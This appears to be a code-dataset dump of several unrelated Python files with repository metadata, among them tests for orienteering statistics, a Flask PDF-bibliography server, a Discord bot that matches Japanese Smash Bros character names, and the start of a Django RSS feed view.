assert occuracesOfPosition(listToResult([55, 66]), 1) == 0
assert occuracesOfPosition(listToResult([8, 9, 3, 7, 3]), 1) == 0
def test_occursInList(self) -> None:
assert occuracesOfPosition(listToResult([5, 4, 3, 2, 1]), 1) == 1
assert occuracesOfPosition(listToResult([1, 2, 3, 5, 1]), 1) == 2
assert occuracesOfPosition(listToResult([1, 1, 2, 1, 2]), 1) == 3
assert occuracesOfPosition(listToResult([5, 4, 3, 2, 1]), 2) == 1
assert occuracesOfPosition(listToResult([1, 2, 3, 5, 1]), 2) == 1
assert occuracesOfPosition(listToResult([1, 1, 2, 1, 2]), 2) == 2
assert occuracesOfPosition(listToResult([5, 4, 3, 2, 10]), 10) == 1
assert occuracesOfPosition(listToResult([10, 2, 3, 10]), 10) == 2
assert occuracesOfPosition(listToResult([10, 10, 10, 2]), 10) == 3
class Test_calculateCourseStatistics:
def test_noData(self) -> None:
assert calculateCourseStatistics([]) == {}
def test_oneResult(self) -> None:
assert calculateCourseStatistics(
[{"course": "red", "time": 5, "incomplete": False, "position": 1}]
) == {"red": {"average": 5, "standardDeviation": 0}}
def test_twoResults(self) -> None:
results = [
{"course": "red", "time": 4, "incomplete": False, "position": 1},
{"course": "red", "time": 8, "incomplete": False, "position": 1},
]
assert calculateCourseStatistics(results)["red"]["average"] == 6
assert (
round(calculateCourseStatistics(results)["red"]["standardDeviation"]) == 3
)
class Test_calculateCourseTop3Average:
def test_noData(self) -> None:
assert calculateCourseTop3Average([]) == {}
def test_oneResult(self) -> None:
assert (
calculateCourseTop3Average(
[{"course": "red", "time": 5, "incomplete": False, "position": 1}]
)["red"]
== 5
)
def test_twoResults(self) -> None:
results = [
{"course": "red", "time": 4, "incomplete": False, "position": 1},
{"course": "red", "time": 8, "incomplete": False, "position": 1},
]
assert calculateCourseTop3Average(results)["red"] == 6
def test_threeResults(self) -> None:
results = [
{"course": "red", "time": 4, "incomplete": False, "position": 1},
{"course": "red", "time": 8, "incomplete": False, "position": 1},
{"course": "red", "time": 12, "incomplete": False, "position": 1},
]
assert calculateCourseTop3Average(results)["red"] == 8
def test_fiveResults(self) -> None:
results = [
{"course": "red", "time": 4, "incomplete": False, "position": 1},
{"course": "red", "time": 8, "incomplete": False, "position": 1},
{"course": "red", "time": 12, "incomplete": False, "position": 1},
{"course": "red", "time": 65, "incomplete": False, "position": 1},
{"course": "red", "time": 155, "incomplete": False, "position": 1},
]
assert calculateCourseTop3Average(results)["red"] == 8
def test_fiveResultsRandomOrder(self) -> None:
results = [
{"course": "red", "time": 12, "incomplete": False, "position": 1},
{"course": "red", "time": 8, "incomplete": False, "position": 1},
{"course": "red", "time": 155, "incomplete": False, "position": 1},
{"course": "red", "time": 4, "incomplete": False, "position": 1},
{"course": "red", "time": 65, "incomplete": False, "position": 1},
]
assert calculateCourseTop3Average(results)["red"] == 8
class Test_getMultiplier:
def test_runningStandardCourse(self) -> None:
assert getMultiplier("M10", "YELLOW") == 1000
assert getMultiplier("W12", "ORANGE") == 1000
assert getMultiplier("M14", "LIGHT GREEN") == 1000
assert getMultiplier("W16", "GREEN") == 1000
assert getMultiplier("M18", "Brown") == 1000
assert getMultiplier("W20", "BLUE") == 1000
assert getMultiplier("M21", "BROWN") == 1000
assert getMultiplier("W35", "BLUE") == 1000
assert getMultiplier("M40", "BROWN") == 1000
assert getMultiplier("W45", "SHORT BLUE") == 1000
assert getMultiplier("M50", "SHORT BROWN") == 1000
assert getMultiplier("W55", "GREEN") == 1000
assert getMultiplier("M60", "BLUE") == 1000
assert getMultiplier("W65", "SHORT GREEN") == 1000
assert getMultiplier("M70", "GREEN") == 1000
assert getMultiplier("W75", "SHORT GREEN") == 1000
assert getMultiplier("M80", "SHORT GREEN") == 1000
def test_runningUp(self) -> None:
assert getMultiplier("W10", "ORANGE") == 1200
assert getMultiplier("M12", "LIGHT GREEN") == 1200
assert getMultiplier("W14", "GREEN") == 1210
assert getMultiplier("M16", "BROWN") == 1210
assert getMultiplier("W18", "BLACK") == 1452
assert getMultiplier("M20", "BLACK") == 1200
assert getMultiplier("W21", "BLACK") == 1200
assert getMultiplier("M35", "BLACK") == 1200
assert getMultiplier("W40", "BROWN") == 1210
assert getMultiplier("M45", "BROWN") == 1100
assert getMultiplier("W50", "BROWN") == 1331
assert getMultiplier("M55", "SHORT BROWN") == 1100
assert getMultiplier("W60", "SHORT BLUE") == 1100
assert getMultiplier("M65", "BROWN") == 1331
assert getMultiplier("W70", "BLUE") == 1331
assert getMultiplier("M75", "GREEN") == 1100
assert getMultiplier("W80", "BLACK") == 1933
def test_badAgeClass(self) -> None:
assert getMultiplier("W", "BROWN") == 1000
assert getMultiplier("M", "BROWN") == 1000
assert getMultiplier("WA", "BROWN") == 1000
assert getMultiplier("MWERR", "BROWN") == 1000
assert getMultiplier("", "BROWN") == 1000
| 44.630137 | 86 | 0.57612 | 650 | 6,516 | 5.746154 | 0.178462 | 0.198394 | 0.123159 | 0.122088 | 0.448996 | 0.41071 | 0.368942 | 0.357162 | 0.313788 | 0.257296 | 0 | 0.078544 | 0.249693 | 6,516 | 145 | 87 | 44.937931 | 0.685416 | 0 | 0 | 0.290323 | 0 | 0 | 0.157459 | 0 | 0 | 0 | 0 | 0 | 0.524194 | 1 | 0.129032 | false | 0 | 0.016129 | 0.008065 | 0.185484 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5d3f1aaa2a4db3d649462b9a4b2872c64304957 | 911 | py | Python | wsdeval/formats/wordnet.py | frankier/finn-wsd-eval | 11671a7d87e16a9b45f5bea8a5db3d2f25f31d40 | [
"Apache-2.0"
] | null | null | null | wsdeval/formats/wordnet.py | frankier/finn-wsd-eval | 11671a7d87e16a9b45f5bea8a5db3d2f25f31d40 | [
"Apache-2.0"
] | 2 | 2018-09-22T08:38:23.000Z | 2019-03-22T13:11:34.000Z | wsdeval/formats/wordnet.py | frankier/finn-wsd-eval | 11671a7d87e16a9b45f5bea8a5db3d2f25f31d40 | [
"Apache-2.0"
] | null | null | null | import sys
from stiff.data.constants import UNI_POS_WN_MAP
from finntk.wordnet.reader import get_en_fi_maps
from finntk.wordnet.utils import pre_id_to_post, ss2pre
def lemmas_from_instance(wn, instance):
word = instance.attrib["lemma"]
pos = UNI_POS_WN_MAP[instance.attrib["pos"]]
lemmas = wn.lemmas(word, pos=pos)
return word, pos, lemmas
def write_lemma(keyout, inst_id, lemma):
fi2en, en2fi = get_en_fi_maps()
if lemma is None:
guess = "U"
else:
chosen_synset_fi_id = ss2pre(lemma.synset())
if chosen_synset_fi_id not in fi2en:
sys.stderr.write(
"No fi2en mapping found for {} ({})\n".format(
chosen_synset_fi_id, lemma
)
)
guess = "U"
else:
guess = pre_id_to_post(fi2en[chosen_synset_fi_id])
keyout.write("{} {}\n".format(inst_id, guess))
| 30.366667 | 62 | 0.626784 | 128 | 911 | 4.1875 | 0.40625 | 0.089552 | 0.104478 | 0.119403 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010526 | 0.270033 | 911 | 29 | 63 | 31.413793 | 0.795489 | 0 | 0 | 0.16 | 0 | 0 | 0.058178 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08 | false | 0 | 0.16 | 0 | 0.28 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5d49c1e85942ea8815872335e92c377df02dcdd | 553 | py | Python | fosspay/database.py | shleeable/fosspay | 05aae16454463c0cd0211b4d706475837f2f007d | [
"MIT"
] | 4 | 2020-06-01T07:09:38.000Z | 2021-04-25T21:27:10.000Z | fosspay/database.py | shleeable/fosspay | 05aae16454463c0cd0211b4d706475837f2f007d | [
"MIT"
] | 3 | 2020-04-19T07:18:41.000Z | 2020-10-15T21:11:12.000Z | fosspay/database.py | shleeable/fosspay | 05aae16454463c0cd0211b4d706475837f2f007d | [
"MIT"
] | 1 | 2021-02-28T08:26:28.000Z | 2021-02-28T08:26:28.000Z | # import sqlite3
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from .config import _cfg, _cfgi
# engine = create_engine(_cfg('connection-string'), module=sqlite3.dbapi2)
engine = create_engine(_cfg('connection-string'))
db = scoped_session(sessionmaker(autocommit=False, autoflush=False, bind=engine))
Base = declarative_base()
Base.query = db.query_property()
def init_db():
import fosspay.objects
Base.metadata.create_all(bind=engine)
| 29.105263 | 81 | 0.797468 | 71 | 553 | 6.014085 | 0.464789 | 0.098361 | 0.117096 | 0.098361 | 0.173302 | 0.173302 | 0 | 0 | 0 | 0 | 0 | 0.006061 | 0.104882 | 553 | 18 | 82 | 30.722222 | 0.856566 | 0.157324 | 0 | 0 | 0 | 0 | 0.036717 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.454545 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
e5d700f93cac04fc331b71c3c1e4693e6a3e9976 | 1,600 | py | Python | emojis/db/generator.py | mercuree/emojis | 43437a2929ccb1f1783ae13c8dcb9570ce401abd | [
"MIT"
] | null | null | null | emojis/db/generator.py | mercuree/emojis | 43437a2929ccb1f1783ae13c8dcb9570ce401abd | [
"MIT"
] | null | null | null | emojis/db/generator.py | mercuree/emojis | 43437a2929ccb1f1783ae13c8dcb9570ce401abd | [
"MIT"
] | null | null | null | import argparse
import os
from datetime import datetime
import requests
JSON_DB_FILE = 'https://raw.githubusercontent.com/github/gemoji/master/db/emoji.json'
def generate(path, dbname):
req = requests.get(JSON_DB_FILE)
req.raise_for_status()
data = req.json()
path = os.path.join(path, dbname)
with open(path, 'w') as file:
file.write('### This is a generated file.\n')
file.write('### Do not edit this file.\n')
file.write('### Date: {0}\n'.format(datetime.now().isoformat()[:-7]))
file.write('### This file is based on "{0}".\n'.format(JSON_DB_FILE))
file.write('\n')
file.write('from collections import namedtuple\n')
file.write('\n')
file.write('Emoji = namedtuple("Emoji", ["aliases", "emoji", "tags", "category"])\n')
file.write('\n')
file.write('EMOJI_DB = [\n')
for emoji in data:
if 'emoji' in emoji:
file.write(' Emoji({aliases}, "{emoji}", {tags}, "{category}"),\n'.format(**{
'aliases': emoji['aliases'],
'emoji': emoji['emoji'],
'tags': emoji['tags'],
'category': emoji['category'],
}))
file.write(']\n')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Generates the Emoji database.')
parser.add_argument('--dir', default='.', help='Database location')
parser.add_argument('--dbname', default='db.py', help='Database location')
args = parser.parse_args()
generate(args.dir, args.dbname)
| 32.653061 | 96 | 0.575 | 192 | 1,600 | 4.6875 | 0.380208 | 0.12 | 0.077778 | 0.046667 | 0.142222 | 0.121111 | 0.055556 | 0 | 0 | 0 | 0 | 0.002483 | 0.245 | 1,600 | 48 | 97 | 33.333333 | 0.74255 | 0 | 0 | 0.083333 | 1 | 0 | 0.31625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027778 | false | 0 | 0.138889 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5d7325ca98374479c7e719100f4da872f071b99 | 5,653 | py | Python | pdfs/Commands/WWW.py | tmearnest/sbd | 92e59ed6286ff7b6a036688db086e47951f07cdd | [
"MIT"
] | null | null | null | pdfs/Commands/WWW.py | tmearnest/sbd | 92e59ed6286ff7b6a036688db086e47951f07cdd | [
"MIT"
] | null | null | null | pdfs/Commands/WWW.py | tmearnest/sbd | 92e59ed6286ff7b6a036688db086e47951f07cdd | [
"MIT"
] | null | null | null | from .Command import Command
class WWW(Command):
command = 'www'
help = "Spin up http server"
def set_args(self, subparser):
subparser.add_argument("--port","-P", help="Port number to listen on", type=int, default=5000)
def run(self, args):
import logging
import mimetypes
import os
import flask
import jinja2
from ..Database import Database
from ..HTMLBib import bibContext, authorNorm
from ..Exceptions import UserException
from ..Bibtex import unicodeNorm
if not args.debug:
logging.getLogger('werkzeug').setLevel(logging.ERROR)
Database(dataDir=args.data_dir)
flaskApp = flask.Flask("pdfs")
flaskApp.jinja_env.trim_blocks = True
flaskApp.jinja_env.lstrip_blocks = True
flaskApp.jinja_loader=jinja2.PackageLoader("pdfs")
def mkTagList(db):
if db.tags:
return ' '.join('<a class="tags" href="/tag/{0}">{0}</a>'.format(t) for t in sorted(db.tags))
def keySort(xs):
return sorted(xs, key=lambda x: x.key())
def doSearch(tag=None, text=None, author=None, title=None):
db = Database(dataDir=args.data_dir)
ctx = dict(article_dir=os.path.basename(os.path.dirname(db.dataDir)),
tags=mkTagList(db))
if tag:
ctx['entries'] = bibContext(keySort(filter(lambda x: tag in x.tags, db.works)))
ctx['search'] = "tag:" + tag
elif text:
entries, searchData = [], []
for result in db.search(text, formatter="html"):
entries.append(result['entry'])
searchData.append(result)
bctx = bibContext(entries)
for c,r in zip(bctx,searchData):
c['searchTxt'] = dict(score=r['score'], frags=r['frags'])
ctx['entries'] = bctx[::-1]
ctx['search'] = "text:" + text
elif author:
def isAuth(e):
n, au, ed = set(), e.author(), e.editor()
if au:
n.update(authorNorm(x.split(', ')[0]) for x in au.split(' and '))
if ed:
n.update(authorNorm(x.split(', ')[0]) for x in ed.split(' and '))
return author in n
matches = keySort(filter(isAuth, db.works))
ctx['entries'] = bibContext(matches)
ctx['search'] = "author:" + author
elif title:
def m(x):
return title.lower() in unicodeNorm(x.title()).lower()
ctx['entries'] = bibContext(keySort(filter(m, db.works)))
ctx['search'] = "title:" + title
else:
ctx['entries'] = bibContext(keySort(db.works))
return ctx
@flaskApp.route('/')
def listFiles():
return flask.render_template('bibliography.html', **doSearch())
@flaskApp.route('/search')
def searchFiles():
query=flask.request.args.get('q', '')
queryType=flask.request.args.get('t', '')
if queryType == "text":
ctx = doSearch(text=query)
elif queryType == "author":
ctx = doSearch(author=query)
elif queryType == "title":
ctx = doSearch(title=query)
elif queryType == "tag":
ctx = doSearch(tag=query)
else:
raise RuntimeError("got bad query {}:{}".format(queryType, query))
return flask.render_template('bibliography.html', **ctx)
@flaskApp.route('/author/<author>')
def listFilesByAuthor(author):
return flask.render_template('bibliography.html', **doSearch(author=author))
@flaskApp.route('/tag/<tag>')
def listFilesByTag(tag):
return flask.render_template('bibliography.html', **doSearch(tag=tag))
@flaskApp.route('/<key>.pdf')
def getPdf(key):
db = Database(dataDir=args.data_dir)
try:
pdfFile = next(filter(lambda x: x.key() == key, db.works)).files[0]
except StopIteration:
raise KeyError
resp = flask.make_response(open(os.path.join(db.dataDir, pdfFile), "rb").read())
resp.content_type = 'application/pdf'
return resp
@flaskApp.route('/attachment/<string:key>-<int:idx>.<string:ext>')
def getAttached(key, idx, ext):
db = Database(dataDir=args.data_dir)
try:
attFile = next(filter(lambda x: x.key() == key, db.works)).files[idx]
except StopIteration:
raise KeyError
filePath = os.path.join(db.dataDir, attFile)
resp = flask.make_response(open(filePath, "rb").read())
mime, _ = mimetypes.guess_type(filePath)
resp.content_type = mime or 'application/octet-stream'
return resp
@flaskApp.route('/<key>.bib')
def getBib(key):
db = Database(dataDir=args.data_dir)
e = db.find(key=key)
resp = flask.make_response(e.bibtex)
resp.content_type = 'text/plain'
return resp
try:
flaskApp.run(port=args.port)
except OSError as err:
if 'Address already in use' in str(err):
raise UserException("Port {} already in use.".format(args.port))
else:
raise
| 36.707792 | 109 | 0.5268 | 607 | 5,653 | 4.864909 | 0.29654 | 0.030816 | 0.032171 | 0.038943 | 0.211311 | 0.150356 | 0.12699 | 0.0447 | 0.0447 | 0.024382 | 0 | 0.003232 | 0.343181 | 5,653 | 153 | 110 | 36.947712 | 0.792082 | 0 | 0 | 0.137097 | 0 | 0 | 0.095348 | 0.016628 | 0 | 0 | 0 | 0 | 0 | 1 | 0.112903 | false | 0 | 0.080645 | 0.040323 | 0.314516 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5d751700fbfc083b181f629d2da2225fc4505cb | 9,593 | py | Python | nessmado_discord_manager.py | subaru3535/discordpy-startup | 94c700f6af590c56f05708a3556198c20f9ee9e4 | [
"MIT"
] | null | null | null | nessmado_discord_manager.py | subaru3535/discordpy-startup | 94c700f6af590c56f05708a3556198c20f9ee9e4 | [
"MIT"
] | null | null | null | nessmado_discord_manager.py | subaru3535/discordpy-startup | 94c700f6af590c56f05708a3556198c20f9ee9e4 | [
"MIT"
] | null | null | null | # スクリプト名:nessmado_function.py
# バージョン:5.01
# 作成日:2019/03/xx
# 最終更新日:2019/10/14
# 作成者:(へっへ)
# スクリプト概要:
# |キャラ対策チャンネル(大元)に「質問」から始まるメッセージを投稿すると、
# |各キャラ別の対策チャンネルに文言をコピーした上で、
# |大元のキャラ対策チャンネルと雑談チャンネルに周知メッセージを送る。
"""更新履歴
2019/03/xx ver 3.0?覚えてない。
オブジェクト指向に沿ってクラス化。
2019/07/31 Ver 5.0
勇者追加。
2019/10/14 Ver 5.1
バンカズ追加。
NESS_SKILLクラス考慮。
"""
# discordAPIモジュール
from discord import message
from discord import client
from discord import channel
# 自作モジュール
from NMconfig import NMConfig
class ChannelManager:
def __init__(self):
self.nmconfig = NMConfig()
self.TOKEN = ""
self.ZATSUDAN_CHANNEL_ID = ""
self.CHARACTER_TAISAKU_ID = "" # 「対策」は英語で"counterplan"って言うらしいが分かりにくいので
self.MATCH_CHANNEL_ID = ""
self.TAISAKU_STAMP = ""
self.NESS_SKILL_CHANNEL_ID = ""
self.STARVED_MATCHING = ""
self.MYCHARACTER = ""
self.inputConfig()
def inputConfig(self):
self.TOKEN = self.nmconfig.TOKEN
self.ZATSUDAN_CHANNEL_ID = self.nmconfig.ZATSUDAN_CHANNEL_ID
self.CHARACTER_TAISAKU_ID = self.nmconfig.CHARACTER_TAISAKU_ID
self.MATCH_CHANNEL_ID = self.nmconfig.MATCH_CHANNEL_ID
self.TAISAKU_STAMP = self.nmconfig.TAISAKU_STAMP
self.NESS_SKILL_CHANNEL_ID = self.nmconfig.NESS_SKILL_CHANNEL_ID
self.STARVED_MATCHING = self.nmconfig.STARVED_MATCHING
self.MYCHARACTER = self.nmconfig.MYCHARACTER
def judgeNameContained(self, client, ch_name, content) -> bool:
"""
キャラクター名について、包括してしまっている名前はいい感じに振り分けしてくれる処理。
TO:DO本当はさ、もっとスッキリ書けることなんてわかってるんだよ。でもさ、メンドかったんだよ。許してくれな。
"""
if ch_name == 'マリオ':
if ('ドクター' in content) or ('Dr' in content) or ('dr' in content):
return False
elif ch_name == 'ファルコ':
if 'ファルコン' in content:
return False
elif ch_name == 'クッパ':
if ('ジュニア' in content) or ('Jr' in content) or ('jr' in content):
return False
elif ch_name == 'ピット':
if ('ブラック' in content):
return False
elif ch_name == self.MYCHARACTER:
if self._judgeMyCharacterNameContained(client, ch_name, content):
return False
return True
def _judgeMyCharacterNameContained(self, client, ch_name, content) -> bool:
all_channels = client.get_all_channels()
for channel in all_channels:
if channel.name == ch_name:
continue
elif (channel.name in content):
return True
return False
def judgeFuzzyCharacterName(self, ch_name: str, content: str):
"""
質問対象のキャラに対して、質問が投下されるべきチャンネルがどれなのかを
メッセージのキャラ名とキャラクター毎の対策チャンネル名を見比べることで判別している。
ただ、窓民が質問メッセージを書く際に、キャラクターの名前が微妙にチャンネル名と違っちゃう場合が
出てくることが予測される。その名前の差分を力ずくで補完してくれる関数がこいつである。
TO:DO 本当はさ、もっとスッキリ書けることなんてわかってるんだよ。でもさ、メンドかったんだよ。許してくれな。
"""
# ★各キャラ窓へ③
# |ch_nameがチャンネル名称からキャラ名を抽出したものです。
# |各キャラ窓のサーバーに適用させる場合、
# |1. if ch_name == 〜の行のキャラ名をチャンネル名称のキャラ名に合わせる
# |2. ネス窓ではポケトレは1つのチャンネルで対応しているので、これを分ける
# | (分けるに当たり、他の関数も変えるといったことは不要なはずです)
# |3. ネス窓ではMiiファイター用の対策チャンネルを作成していないので、これを作る
# (作るに当たり、他の関数も変えるといったことは不要なはずです)
if ch_name in content:
return True
if ch_name == "ドクマリ":
if ('ドクター' in content) or ('Dr' in content) or ('dr' in content) or ('医者' in content):
return True
if ch_name == "ロゼッタ&チコ":
if ('ロゼチコ' in content) or ('ロゼッタ' in content):
return True
if ch_name == "クッパjr":
if ('ジュニア' in content) or ('Jr' in content) or ('jr' in content):
return True
if ch_name == "パックンフラワー":
if ('パックン' in content) or ('花' in content):
return True
if ch_name == "ドンキーコング":
if ('DK' in content) or ('D.K.' in content) or ('D.K' in content) or ('ドンキー' in content) or ('ゴリラ' in content):
return True
if ch_name == "ディディーコング":
if ('DD' in content) or ('D.D.' in content) or ('D.D' in content) or ('ディディー' in content) or ('猿' in content):
return True
if ch_name == "キングクルール":
if ('クルール' in content) or ('鰐' in content) or ('ワニ' in content):
return True
if ch_name == "ガノンドロフ":
if ('ガノン' in content) or ('おじさん' in content):
return True
if ch_name == "ヤングリンク":
if ('ヤンリン' in content) or ('こどもリンク' in content) or ('子どもリンク' in content) or ('子供リンク' in content):
return True
if ch_name == "トゥーンリンク":
if ('トリン' in content):
return True
if ch_name == "ダークサムス":
if ('ダムス' in content):
return True
if ch_name == "ゼロスーツサムス":
if ('ダムス' in content) or ('ゼロサム' in content) or ('ZSS' in content) or ('ゼロスーツ・サムス' in content):
return True
if ch_name == "ピチュー":
if ('ピチュカス' in content):
return True
if ch_name == "ミュウツー":
if ('M2' in content) or ('m2' in content):
return True
if ch_name == "ポケモントレーナー":
if ('ポケモン・トレーナー' in content) or ('ポケトレ' in content) or ('ゼニガメ' in content) \
or ('フシギソウ' in content) or ('リザードン' in content) or ('リザ' in content):
return True
if ch_name == "ゲッコウガ":
if ('蛙' in content):
return True
if ch_name == "メタナイト":
if ('メタ' in content):
return True
if ch_name == "デデデ":
if ('デデデ大王' in content):
return True
if ch_name == "フォックス":
if ('狐' in content):
return True
if ch_name == "ブラックピット":
if ('ブラック・ピット' in content) or ('ブラピ' in content):
return True
if ch_name == "むらびと":
if ('ムラビト' in content) or ('村人' in content):
return True
if ch_name == "アイスクライマー":
if ('アイス・クライマー' in content) or ('アイクラ' in content):
return True
if ch_name == "インクリング":
if ('スプラゥーン' in content) or ('インリン' in content) or ('イカちゃん' in content) \
or ('いかちゃん' in content) or ('烏賊' in content) or ('イカ' in content):
return True
if ch_name == "キャプテン・ファルコン":
if ('ファルコン' in content) or ('キャプテンファルコン' in content) or ('CF' in content) \
or ('C.F' in content) or ('cf' in content) or ('c.f' in content):
return True
if ch_name == "ダックハント":
if ('ダック・ハント' in content) or ('犬' in content):
return True
if ch_name == "ピクミン&オリマー":
if ('ピクミン&オリマー' in content) or ('ピクオリ' in content) or ('ピクミン' in content) or ('オリマー' in content):
return True
if ch_name == "リトル・マック":
if ('リトルマック' in content) or ('マック' in content) or ('トルマク' in content):
return True
if ch_name == "ロボット":
if ('ロボ' in content):
return True
if ch_name == "mrゲーム&ウォッチ":
if ('ゲムヲ' in content) or ('ゲムオ' in content) or ('ミスター' in content) \
or ('ゲーム&ウォッチ' in content) or ('ゲーム&ウォッチ' in content):
return True
if ch_name == "wii-fitトレーナー":
if ('フィットレ' in content) or ('Wii Fit' in content) or ('wii fit' in content) \
or ('Wii fit' in content) or ('wii Fit' in content) or ('Wii-Fit' in content) or ('wii-fit' in content) \
or ('Wii-fit' in content) or ('wii-Fit' in content)or ('wii-Fit' in content) \
or ('tトレーナー' in content)or ('Tトレーナー' in content) or ('t トレーナー' in content)or ('T トレーナー' in content):
return True
if ch_name == "パックマン":
if ('金玉' in content):
return True
if ch_name == "ベヨネッタ":
if ('ベヨ' in content):
return True
if ch_name == "ロックマン":
if ('ロック' in content) or ('岩男' in content):
return True
if ch_name == "ジョーカー":
if ('ペルソナ' in content):
return True
if ch_name == "格闘mii":
if ('格闘Mii' in content) or ('格闘MII' in content):
return True
if ch_name == "剣術mii":
if ('剣術Mii' in content) or ('剣術MII' in content):
return True
if ch_name == "射撃mii":
if ('射撃Mii' in content) or ('射撃MII' in content) or ('シャゲミ' in content):
return True
if ch_name == "勇者":
if ('HERO' in content) or ('hero' in content) or ('Hero' in content) \
or ('HELO' in content) or ('helo' in content) or ('Helo' in content) \
or ('ゆうしゃ' in content) or ('ユウシャ' in content) or ('ゆーしゃ' in content) \
or ('ユーシャ' in content) or ('ひーろー' in content) or ('ヒーロー' in content) \
or ('よしひこ' in content) or ('ヨシヒコ' in content):
return True
if ch_name == "バンジョー&カズーイ":
if ('バンジョー&カズーイ' in content) or ('バンジョーとカズーイ' in content) or ('バンカズ' in content) \
or ('バンジョー' in content) or ('カズーイ' in content):
return True
if ch_name == "ベレスト":
if ('ベレス' in content) or ('ベレト' in content):
return True
return False
| 40.306723 | 125 | 0.533618 | 1,145 | 9,593 | 4.393013 | 0.233188 | 0.248708 | 0.20338 | 0.158648 | 0.46004 | 0.443539 | 0.413121 | 0.139364 | 0.090855 | 0.090855 | 0 | 0.008361 | 0.351715 | 9,593 | 237 | 126 | 40.476793 | 0.799003 | 0.099969 | 0 | 0.27957 | 0 | 0 | 0.099247 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026882 | false | 0 | 0.021505 | 0 | 0.322581 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e5d89d2a5e74dad3c40f155b2e13235f2835045c | 528 | py | Python | awx/main/management/commands/deprovision_node.py | gitEdouble/awx | 5885654405ccaf465f08df4db998a6dafebd9b4d | [
"Apache-2.0"
] | 1 | 2018-09-28T16:02:30.000Z | 2018-09-28T16:02:30.000Z | awx/main/management/commands/deprovision_node.py | gitEdouble/awx | 5885654405ccaf465f08df4db998a6dafebd9b4d | [
"Apache-2.0"
] | 4 | 2020-04-29T23:03:16.000Z | 2022-03-01T23:56:09.000Z | awx/main/management/commands/deprovision_node.py | gitEdouble/awx | 5885654405ccaf465f08df4db998a6dafebd9b4d | [
"Apache-2.0"
] | 2 | 2018-09-03T19:10:02.000Z | 2019-06-12T07:07:16.000Z | # Copyright (c) 2017 Ansible by Red Hat
# All Rights Reserved
# Borrow from another AWX command
from awx.main.management.commands.deprovision_instance import Command as OtherCommand
# Python
import warnings
class Command(OtherCommand):
def handle(self, *args, **options):
# TODO: delete this entire file in 3.3
warnings.warn('This command is replaced with `deprovision_instance` and will '
'be removed in release 3.3.')
return super(Command, self).handle(*args, **options)
| 29.333333 | 86 | 0.69697 | 69 | 528 | 5.304348 | 0.710145 | 0.103825 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01937 | 0.217803 | 528 | 17 | 87 | 31.058824 | 0.866828 | 0.251894 | 0 | 0 | 0 | 0 | 0.226221 | 0.056555 | 0 | 0 | 0 | 0.058824 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5da928182393c5f5c747b08972d2fb8f2ff9446 | 8,775 | py | Python | rss_temple/api/views/feed.py | murrple-1/rss_temple | 289197923b1e7d1213f1673d164337df17d7269b | [
"MIT"
] | null | null | null | rss_temple/api/views/feed.py | murrple-1/rss_temple | 289197923b1e7d1213f1673d164337df17d7269b | [
"MIT"
] | 8 | 2019-12-04T21:58:35.000Z | 2021-12-15T02:29:49.000Z | rss_temple/api/views/feed.py | murrple-1/rss_temple | 289197923b1e7d1213f1673d164337df17d7269b | [
"MIT"
] | null | null | null | from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseNotFound, HttpResponseNotAllowed
from django.db import transaction
import requests
import ujson
from url_normalize import url_normalize
from api import models, query_utils, feed_handler, rss_requests, archived_feed_entry_util
from api.exceptions import QueryException
from api.context import Context
_OBJECT_NAME = 'feed'
def feed(request):
permitted_methods = {'GET'}
if request.method not in permitted_methods:
return HttpResponseNotAllowed(permitted_methods) # pragma: no cover
if request.method == 'GET':
return _feed_get(request)
def feeds_query(request):
permitted_methods = {'POST'}
if request.method not in permitted_methods:
